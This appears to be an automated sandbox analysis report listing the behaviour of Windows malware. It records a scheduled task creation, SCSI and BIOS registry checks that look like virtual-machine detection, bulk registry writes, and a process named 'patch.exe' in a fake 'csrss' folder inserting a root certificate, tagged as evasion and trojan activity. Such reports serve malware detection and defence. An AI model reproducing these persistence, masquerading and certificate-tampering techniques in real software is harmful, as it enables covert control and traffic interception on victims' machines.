File created C:\Windows\Logs\CBS\CbsPersist_20231025045630.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\A118.exe N/A
File created C:\Windows\Tasks\bwpFiyeZPJPVdaMxTt.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSBE11.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSBE11.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\wscript.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage N/A N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft C:\Windows\SysWOW64\wscript.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host C:\Windows\SysWOW64\wscript.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
